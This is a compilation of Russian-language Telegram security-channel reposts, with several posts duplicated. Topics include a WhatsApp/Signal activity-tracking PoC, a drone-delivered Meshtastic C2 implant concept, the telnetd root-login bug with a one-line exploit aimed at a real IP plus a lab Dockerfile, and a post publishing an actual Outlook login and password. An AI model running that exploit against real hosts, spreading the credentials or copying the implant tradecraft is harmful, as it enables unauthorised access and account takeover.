Forwarded from SecAtor
Некто Gommzystudio на GitHub вывалил общедоступный инструмент, позволяющий отслеживать активность более трех млрд. пользователей WhatsApp и Signal.
Зная лишь номер телефона, злоумышленники теперь могут определить, когда пользователь возвращаются домой, когда активно использует телефон, когда ложится спать или когда находится вне сети.
Кроме того, поддерживается функция скрытого снижения заряда и генерации стороннего трафика.
В основе отслеживания активности пользователей используются фундаментальные особенности работы протоколов обмена сообщениями WhatsApp или Signal - метод злоупотребляет подтверждениями доставки для расчета времени кругового пути (RTT) сигнала.
По всей видимости, любой пользователь способен отправить пинг на целевое устройство, при этом приложение ответит, а время отклика будет сильно варьироваться в зависимости от того, что происходит с телефоном, используется Wi-Fi или мобильные данные.
Впервые эту уязвимость, получившую название Silent Whisper, исследователи из Венского университета имени Гегенхубера и SBA Research раскрыли еще в прошлом году.
В частности, отмечалось, что противник может создавать скрытые сообщения, позволяющие с высокой частотой (до долей секунды) исследовать цель, не вызывая при этом никаких уведомлений со стороны цели и даже в отсутствие текущего разговора.
Результаты исследования gommzystudio трансформировал в работающую утилиту, демонстрирующую, насколько легко отслеживать активность пользователей мессенджеров.
Мессенджеры отправляют уведомления о доставке и прочтении всякий раз, когда пользователь получает сообщение или реагирует на него.
Однако для получения этих уведомлений злоумышленникам не нужно отправлять какие-либо реальные сообщения. Вместо этого они могут «реагировать» на несуществующие сообщения.
Как пояснил gommzystudio, трекер отправляет сообщения-реакции на несуществующие идентификаторы сообщений, что не вызывает никаких уведомлений на целевом устройстве.
Приложения отвечают, не проверив, существует ли сообщение/реакция на самом деле, поскольку для подтверждения приема сетевых пакетов на низком уровне автоматически отправляются подтверждения доставки (ACK).
На Reddit gommzystudio рассказал, как ему удавалось рассылать зондирующие запросы с интервалом примерно в 50 мс, а целевой пользователь ничего не видел - ни всплывающих окон, ни уведомлений, ни сообщений, ничего не отображалось в пользовательском интерфейсе.
При этом на устройство начиналась быстрая разрядка батареи, а потребление мобильного трафика значительно возрастало.
При этом жертва не сможет обнаружить ничего из этого, пока физически не подключит девай к компьютеру и не изучит его содержимое.
Реализуя 20 и более пингов в секунду, можно фиксировать поведение пользователя: когда человек, вероятно, находится дома (стабильное время отклика Wi-Fi), когда он, скорее всего, спит (длительные периоды ожидания/отключения), когда он находится вне дома и передвигается (характеристики времени отклика мобильных данных).
В оригинальной статье подробно описаны и другие различные способы, которыми злоумышленники могут реализовать эту уязвимость.
По части батареи исследователи смогли значительно увеличить расход заряда.
Как правило, телефон в режиме ожидания потребляет менее 1% заряда в час. Однако в ходе тестов с WhatsApp iPhone 13 Pro терял 14% в час, iPhone 11 - 18%, а Samsung Galaxy S23 - 15%.
Однако Signal внедрил ограничение скорости получения уведомлений, чего не было в WhatsApp. Поэтому после часа атаки заряд батареи снизился всего на 1%.
Возможная вредоносная активность также расходует трафик, ухудшая удобство использования других ресурсоемкими приложениями, такими как видеозвонки.
Кроме того, уязвимость RTT позволяла также зондировать местоположение пользователя.
Исследователь отдельно предупреждает, что по состоянию на декабрь 2025 года эта уязвимость по-прежнему может быть реализована в WhatsApp и Signal.
Зная лишь номер телефона, злоумышленники теперь могут определить, когда пользователь возвращаются домой, когда активно использует телефон, когда ложится спать или когда находится вне сети.
Кроме того, поддерживается функция скрытого снижения заряда и генерации стороннего трафика.
В основе отслеживания активности пользователей используются фундаментальные особенности работы протоколов обмена сообщениями WhatsApp или Signal - метод злоупотребляет подтверждениями доставки для расчета времени кругового пути (RTT) сигнала.
По всей видимости, любой пользователь способен отправить пинг на целевое устройство, при этом приложение ответит, а время отклика будет сильно варьироваться в зависимости от того, что происходит с телефоном, используется Wi-Fi или мобильные данные.
Впервые эту уязвимость, получившую название Silent Whisper, исследователи из Венского университета имени Гегенхубера и SBA Research раскрыли еще в прошлом году.
В частности, отмечалось, что противник может создавать скрытые сообщения, позволяющие с высокой частотой (до долей секунды) исследовать цель, не вызывая при этом никаких уведомлений со стороны цели и даже в отсутствие текущего разговора.
Результаты исследования gommzystudio трансформировал в работающую утилиту, демонстрирующую, насколько легко отслеживать активность пользователей мессенджеров.
Мессенджеры отправляют уведомления о доставке и прочтении всякий раз, когда пользователь получает сообщение или реагирует на него.
Однако для получения этих уведомлений злоумышленникам не нужно отправлять какие-либо реальные сообщения. Вместо этого они могут «реагировать» на несуществующие сообщения.
Как пояснил gommzystudio, трекер отправляет сообщения-реакции на несуществующие идентификаторы сообщений, что не вызывает никаких уведомлений на целевом устройстве.
Приложения отвечают, не проверив, существует ли сообщение/реакция на самом деле, поскольку для подтверждения приема сетевых пакетов на низком уровне автоматически отправляются подтверждения доставки (ACK).
На Reddit gommzystudio рассказал, как ему удавалось рассылать зондирующие запросы с интервалом примерно в 50 мс, а целевой пользователь ничего не видел - ни всплывающих окон, ни уведомлений, ни сообщений, ничего не отображалось в пользовательском интерфейсе.
При этом на устройство начиналась быстрая разрядка батареи, а потребление мобильного трафика значительно возрастало.
При этом жертва не сможет обнаружить ничего из этого, пока физически не подключит девай к компьютеру и не изучит его содержимое.
Реализуя 20 и более пингов в секунду, можно фиксировать поведение пользователя: когда человек, вероятно, находится дома (стабильное время отклика Wi-Fi), когда он, скорее всего, спит (длительные периоды ожидания/отключения), когда он находится вне дома и передвигается (характеристики времени отклика мобильных данных).
В оригинальной статье подробно описаны и другие различные способы, которыми злоумышленники могут реализовать эту уязвимость.
По части батареи исследователи смогли значительно увеличить расход заряда.
Как правило, телефон в режиме ожидания потребляет менее 1% заряда в час. Однако в ходе тестов с WhatsApp iPhone 13 Pro терял 14% в час, iPhone 11 - 18%, а Samsung Galaxy S23 - 15%.
Однако Signal внедрил ограничение скорости получения уведомлений, чего не было в WhatsApp. Поэтому после часа атаки заряд батареи снизился всего на 1%.
Возможная вредоносная активность также расходует трафик, ухудшая удобство использования других ресурсоемкими приложениями, такими как видеозвонки.
Кроме того, уязвимость RTT позволяла также зондировать местоположение пользователя.
Исследователь отдельно предупреждает, что по состоянию на декабрь 2025 года эта уязвимость по-прежнему может быть реализована в WhatsApp и Signal.
GitHub
GitHub - gommzystudio/device-activity-tracker: A phone number can reveal whether a device is active, in standby or offline (and…
A phone number can reveal whether a device is active, in standby or offline (and more). This PoC demonstrates how delivery receipts + RTT timing leak sensitive device-activity patterns. (WhatsApp /...
👍3❤1
Forwarded from Too Many Apples
В этом году решил сделать отчет о проделанной работе и поделиться им с общественностью. Этот отчет рассказывает о результатах работы нашей ИБ команды за этот год. И в РФ и в мире так делают редко - сказываются особенности области, подход security through obscurity, да и просто не готовность и не способность открыто рассказывать о реальных результатах работы.
Мы считаем иначе. Открытое обсуждение и обмен лучшими практиками ускоряет развитие инфобеза, оздоровляет индустрию, меняет отношение не-ибшников к нашей работе в лучшую сторону.
Выношу огромную благодарность всей команде за работу. Особая благодарность Илье за сведение и оформление отчета.
Вашему вниманию отчет, мы постарались чтобы он был в своем роде руководством к действию, отвечал на вопрос "а как можно решить ту или иную задачу, выстроить тот или иной процесс". Буду признателен комментариям и мнениям, что понравилось, а что - нет, вопросам и критике.
Мы считаем иначе. Открытое обсуждение и обмен лучшими практиками ускоряет развитие инфобеза, оздоровляет индустрию, меняет отношение не-ибшников к нашей работе в лучшую сторону.
Выношу огромную благодарность всей команде за работу. Особая благодарность Илье за сведение и оформление отчета.
Вашему вниманию отчет, мы постарались чтобы он был в своем роде руководством к действию, отвечал на вопрос "а как можно решить ту или иную задачу, выстроить тот или иной процесс". Буду признателен комментариям и мнениям, что понравилось, а что - нет, вопросам и критике.
👍2
Forwarded from AD_POHEQUE
интернет отрубили, vpn задушили, ngfw дышит в затылок — а у тебя свой маленький «биврёст» на LoRa.
meshtastic как канал связи. при желании докручивается до ExpressLRS/ Crossfire, умельцы есть.
это ровно то, чего нет в корпоративных методичках: альтернативный, медленный, но живучий канал управления.
никакого tcp/ip, никакого dpi, никакого «давайте добавим сигнатуру в next gen firewall» — трафик ушёл в эфир и прошёл мимо их игрушек.
решат бороться с такой закладкой через РЭБ расположенный в офисе или цеху, то лягут:
• bluetooth-наушники любимых сеньоров
• «умные» кондиционеры
• половина датчиков и прочего iot-шлака
• АСУТП, ПЛК
всё, что дышит тем же диапазоном. чтобы выжечь один аккуратный mesh-канал, придётся устроить реальный саботаж своими же руками так и не получив желаемого.
для red team это ещё один слой выживания:
оставил физическую закладку с meshtastic → поднял аварийный c2-канал вне ip → даже если основной доступ лёг, у тебя остаётся тихий запасной маршрут. в рамках упражнений и учений — актуальная модель угроз.
дальше в игру заходят люди, которые вчера гоняли fpv под помехами, а сегодня вернулись «на гражданку». для них «обойти периметр завода и найти слепую зону» — это тривиальная задача на вечер.
и внезапно выясняется, что для закладки не нужен ни «социальный инженер», ни экскурсия в офис. достаточно в сценарии учений:
— приехать на каршеринге,
— пройтись вдоль периметра,
— проверить эфир обычными bluetooth-наушниками: если музыка не рвётся — радиообстановка более-менее чистая.
дальше включается беспилотная школа. лёгкий борт с камерой и нормальной антенной спокойно перелетает забор и оставляет внутри то, что раньше просили заносить «под видом флешки»:
маленький модуль с lora/meshtastic, wi-fi, чем угодно ещё. хоть на подоконник, хоть через открытую форточку и там уже на шкаф.
есть поддержка изнутри — вообще праздник: воткнулся в шнурок по классике, и привет, out-of-band для тех же учений.
важное здесь не «как так сделать», а что модель угроз большинства контор этого просто не видит. у них до сих пор всё крутится вокруг:
— периметр → ngfw → прокси
— офис → домен → soc
а над забором уже спокойно летает другая эпоха, где инженер по беспилотникам в паре с red team даёт такой out-of-band, который никакой «стажёр кладовщик» не обеспечит.
если вы отвечаете за защиту и всё ещё мыслите только ip-сетями и турникетами — вы динозавр и не видите целый класс каналов связи.
репозиторий для изучения:
https://github.com/benjaminchodroff/meshtastic_c2
👾
meshtastic как канал связи. при желании докручивается до ExpressLRS/ Crossfire, умельцы есть.
это ровно то, чего нет в корпоративных методичках: альтернативный, медленный, но живучий канал управления.
никакого tcp/ip, никакого dpi, никакого «давайте добавим сигнатуру в next gen firewall» — трафик ушёл в эфир и прошёл мимо их игрушек.
решат бороться с такой закладкой через РЭБ расположенный в офисе или цеху, то лягут:
• bluetooth-наушники любимых сеньоров
• «умные» кондиционеры
• половина датчиков и прочего iot-шлака
• АСУТП, ПЛК
всё, что дышит тем же диапазоном. чтобы выжечь один аккуратный mesh-канал, придётся устроить реальный саботаж своими же руками так и не получив желаемого.
для red team это ещё один слой выживания:
оставил физическую закладку с meshtastic → поднял аварийный c2-канал вне ip → даже если основной доступ лёг, у тебя остаётся тихий запасной маршрут. в рамках упражнений и учений — актуальная модель угроз.
дальше в игру заходят люди, которые вчера гоняли fpv под помехами, а сегодня вернулись «на гражданку». для них «обойти периметр завода и найти слепую зону» — это тривиальная задача на вечер.
и внезапно выясняется, что для закладки не нужен ни «социальный инженер», ни экскурсия в офис. достаточно в сценарии учений:
— приехать на каршеринге,
— пройтись вдоль периметра,
— проверить эфир обычными bluetooth-наушниками: если музыка не рвётся — радиообстановка более-менее чистая.
дальше включается беспилотная школа. лёгкий борт с камерой и нормальной антенной спокойно перелетает забор и оставляет внутри то, что раньше просили заносить «под видом флешки»:
маленький модуль с lora/meshtastic, wi-fi, чем угодно ещё. хоть на подоконник, хоть через открытую форточку и там уже на шкаф.
есть поддержка изнутри — вообще праздник: воткнулся в шнурок по классике, и привет, out-of-band для тех же учений.
важное здесь не «как так сделать», а что модель угроз большинства контор этого просто не видит. у них до сих пор всё крутится вокруг:
— периметр → ngfw → прокси
— офис → домен → soc
а над забором уже спокойно летает другая эпоха, где инженер по беспилотникам в паре с red team даёт такой out-of-band, который никакой «стажёр кладовщик» не обеспечит.
если вы отвечаете за защиту и всё ещё мыслите только ip-сетями и турникетами — вы динозавр и не видите целый класс каналов связи.
репозиторий для изучения:
https://github.com/benjaminchodroff/meshtastic_c2
👾
👍11❤1
Ребёнок с телефоном/планшетом, а настройки «потом сделаю»?
Сохраните этот чек‑лист и пройдитесь по нему сегодня. 15 минут — и устройство станет заметно безопаснее.
————————
1. Устройство
1. Включите родительский контроль - Family Link (Android) или «Экранное время»/«Ограничения» (iOS).
2. Разрешите установку новых приложений только с вашего одобрения.
3. Подключите семейный DNS‑фильтр (например, семейный режим Яндекс DNS).
4. Задайте лимит времени на использование устройства. Границы лучше бесконечных «ещё пять минут».
5. Отключите лишние уведомления от приложений.
6. Заблокируйте встроенные покупки или поставьте отдельный пароль.
————————
2. Игры (Roblox и другие)
7. Включите PIN‑код аккаунта ребёнка.
8. Подключите двухфакторную аутентификацию (2FA).
9. Настройте чат: «выкл.» или «только друзья».
10. В друзьях оставьте только реальных знакомых.
11. Отключите тренды и рекомендации.
12. Составьте «разрешённый список» игр.
————————
3. Видео (YouTube и др.)
13. Для младших школьников — только YouTube Kids.
14. Включите ограниченный режим на роутере, а не только на устройстве.
15. Составьте «разрешённый список» каналов.
16. Регулярно просматривайте историю поиска и просмотров.
17. Отключите автопроигрывание следующего видео.
————————
Технологии — лишь часть защиты.
Вторая половина — ваши правила и разговор с ребёнком о том, что в интернете допустимо, а что нет.
————————
Сохраните этот чек‑лист и пройдитесь по нему сегодня. 15 минут — и устройство станет заметно безопаснее.
————————
1. Устройство
1. Включите родительский контроль - Family Link (Android) или «Экранное время»/«Ограничения» (iOS).
2. Разрешите установку новых приложений только с вашего одобрения.
3. Подключите семейный DNS‑фильтр (например, семейный режим Яндекс DNS).
4. Задайте лимит времени на использование устройства. Границы лучше бесконечных «ещё пять минут».
5. Отключите лишние уведомления от приложений.
6. Заблокируйте встроенные покупки или поставьте отдельный пароль.
————————
2. Игры (Roblox и другие)
7. Включите PIN‑код аккаунта ребёнка.
8. Подключите двухфакторную аутентификацию (2FA).
9. Настройте чат: «выкл.» или «только друзья».
10. В друзьях оставьте только реальных знакомых.
11. Отключите тренды и рекомендации.
12. Составьте «разрешённый список» игр.
————————
3. Видео (YouTube и др.)
13. Для младших школьников — только YouTube Kids.
14. Включите ограниченный режим на роутере, а не только на устройстве.
15. Составьте «разрешённый список» каналов.
16. Регулярно просматривайте историю поиска и просмотров.
17. Отключите автопроигрывание следующего видео.
————————
Технологии — лишь часть защиты.
Вторая половина — ваши правила и разговор с ребёнком о том, что в интернете допустимо, а что нет.
————————
👍13👎4
🚨 В популярной платформе автоматизации рабочих процессов n8n выявлена критическая уязвимость, позволяющая авторизованным пользователям с правами редактирования рабочих процессов выполнять команды операционной системы на хосте.
Уязвимость, зарегистрированная как CVE-2025-68668, имеет оценку CVSS 9,9.
Уязвимость, зарегистрированная как CVE-2025-68668, имеет оценку CVSS 9,9.
👍7
Forwarded from Femida
Сбой Logitech отрубил миллионы мышек
Вчера вечером у Logitech истек Apple Developer Certificate, компания просто забыла его продлить.
Из-за этого у всех пользователей MacOS отказалось работать приложение Options+, которое необходимо для настройки мыши.
Да, для последних моделях мышек Logitech сделали приложение обязательным, без него мышь просто не работает.
Патч для починки приложения появился буквально час назад, его нужно качать отдельно🌟
Вчера вечером у Logitech истек Apple Developer Certificate, компания просто забыла его продлить.
Из-за этого у всех пользователей MacOS отказалось работать приложение Options+, которое необходимо для настройки мыши.
Да, для последних моделях мышек Logitech сделали приложение обязательным, без него мышь просто не работает.
Патч для починки приложения появился буквально час назад, его нужно качать отдельно
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍5❤1🤯1😱1
Forwarded from Cybred
Secrets Patterns Database
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
1❤5👍2
Forwarded from OWASP RU
В ближайшее время планируется запустить новый сайт консорциума OWASP (включая локальные отделения и проекты) и отказаться от использования площадки Meetup для подписки.
Stay tuned.
https://owasp.org/blog/2026/01/13/retiring-meetup.html
Stay tuned.
https://owasp.org/blog/2026/01/13/retiring-meetup.html
owasp.org
Announcing the Retirement of OWASP Meetup Platform | OWASP Foundation
Announcing the Retirement of OWASP Meetup Platform on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.
👍1
Forwarded from Cybred
Еще даже не успели присвоить CVE
В
Под ударом практически все дистрибутивы Linux, которые ставят
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet
Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
В
telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.Под ударом практически все дистрибутивы Linux, которые ставят
inetutils-telnetd из репозиториев:— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet
Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
$ USER="-f root" telnet -a IP PORT
😱3
Forwarded from вольтаж
взломать интернет бесплатно 2026
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?🐱
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
и вот тут происходит кабум бабах ракета взрыв🤯
1. В бинаре
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
3. содержимое
. . .
Теперь перечитай эксплойт
Да это же уязвимость наargument injection!
Повторим флоу атаки🃏
0. выставляем переменную
1. переменная
2.
3. сервер получает команду
4. бинарь
5. поздравляю,
Dockerfile для тестовой лабы
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
USER="-f root" telnet -a 104.16.149.244 23
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"и вот тут происходит кабум бабах ракета взрыв
1. В бинаре
login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
$USER с целевым логином3. содержимое
$USER переменной никак не санитизируется. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23
Да это же уязвимость на
Повторим флоу атаки
0. выставляем переменную
$USER="-f root" и включаем автологин -a1. переменная
$USER не проверяется, но учитывается сервером2.
$USER подставляется в шаблон логина вместо {%U}3. сервер получает команду
/usr/bin/login -p -f root4. бинарь
login скипает аутентификацию из-за -f5. поздравляю,
ты root
———Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
😱4❤3🤯3👍1
Официальный механизм обновления Notepad++ был взломан для распространения вредоносного ПО среди отдельных пользователей.
Это произошло чуть более чем через месяц после того, как Notepad++ выпустил версию 8.8.9, в которой была устранена проблема, из-за которой трафик от WinGup, программы обновления Notepad++, «периодически» перенаправлялся на вредоносные домены, что приводило к загрузке зараженных исполняемых файлов.
В частности, проблема заключалась в том, как программа обновления проверяла целостность и подлинность загруженного файла обновления, что позволяло злоумышленнику, способному перехватывать сетевой трафик между клиентом обновления и сервером обновления, обманом заставить инструмент загрузить другой исполняемый файл.
Считается, что это перенаправление было целенаправленным: трафик, исходящий только от определенных пользователей, направлялся на мошеннические серверы и загружал вредоносные компоненты. Предполагается, что инцидент начался в июне 2025 года, более чем за шесть месяцев до того, как он стал известен.
«Атака включала в себя компрометацию инфраструктуры, которая позволила злоумышленникам перехватывать и перенаправлять трафик обновлений, предназначенный для notepad-plus-plus.org», — сказал разработчик Дон Хо . «Компрометация произошла на уровне хостинг-провайдера, а не через уязвимости в самом коде Notepad++».
Это произошло чуть более чем через месяц после того, как Notepad++ выпустил версию 8.8.9, в которой была устранена проблема, из-за которой трафик от WinGup, программы обновления Notepad++, «периодически» перенаправлялся на вредоносные домены, что приводило к загрузке зараженных исполняемых файлов.
В частности, проблема заключалась в том, как программа обновления проверяла целостность и подлинность загруженного файла обновления, что позволяло злоумышленнику, способному перехватывать сетевой трафик между клиентом обновления и сервером обновления, обманом заставить инструмент загрузить другой исполняемый файл.
Считается, что это перенаправление было целенаправленным: трафик, исходящий только от определенных пользователей, направлялся на мошеннические серверы и загружал вредоносные компоненты. Предполагается, что инцидент начался в июне 2025 года, более чем за шесть месяцев до того, как он стал известен.
🤯5😱3❤1
🤯5😱2👍1
Forwarded from SECURITM
«Что ждет Службы ИБ в 2026 году. Главные тренды и вызовы».
На вебинаре ответим на ключевые вопросы:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1
Forwarded from НеКасперский
Подписка посмертно
Джеффри очень хреново следил за безопасностью и реддиторы нашли его учётные данные в опубликованных файлах.
Официально покойный миллиардер стал спонсором лицензионного софта для тысяч людей, он подарил народу бесплатную подписку на Microsoft Office и облачное хранилище.
Логин
Кто-то поставил на аватарку фото растянутого Вэнса, а затем с этого адреса начали рассылать письма Биллу Гейтсу, Алексу Джонсу и Дональду Трампу. Параллельно предпринимались попытки через эту почту восстановить доступ к другим сервисам вроде Xbox, Spotify, Apple ID, Soulseek и Dropbox.
При этом миллиардер вообще не парился о сохранности своих данных, его Outlook-аккаунт даже не был защищён MFA.
Сейчас на аватарке красуется аниме-девочки, захвачен аккаунт какими-то российскими геймерами.
НеКасперский
Джеффри очень хреново следил за безопасностью и реддиторы нашли его учётные данные в опубликованных файлах.
Официально покойный миллиардер стал спонсором лицензионного софта для тысяч людей, он подарил народу бесплатную подписку на Microsoft Office и облачное хранилище.
Логин
lsje_llc@outlook.com принадлежит одной из подставных компаний Эпштейна, а пароль #1Island является отсылкой к его острову Little Saint James. Любопытные пользователи попробовали ввести найденные данные и авторизовались в почтовом ящике, после чего на аккаунте начал твориться полный хаос. Ранее похожий трюк сработал и от учётки его AppleID.Кто-то поставил на аватарку фото растянутого Вэнса, а затем с этого адреса начали рассылать письма Биллу Гейтсу, Алексу Джонсу и Дональду Трампу. Параллельно предпринимались попытки через эту почту восстановить доступ к другим сервисам вроде Xbox, Spotify, Apple ID, Soulseek и Dropbox.
При этом миллиардер вообще не парился о сохранности своих данных, его Outlook-аккаунт даже не был защищён MFA.
Сейчас на аватарке красуется аниме-девочки, захвачен аккаунт какими-то российскими геймерами.
НеКасперский
😱2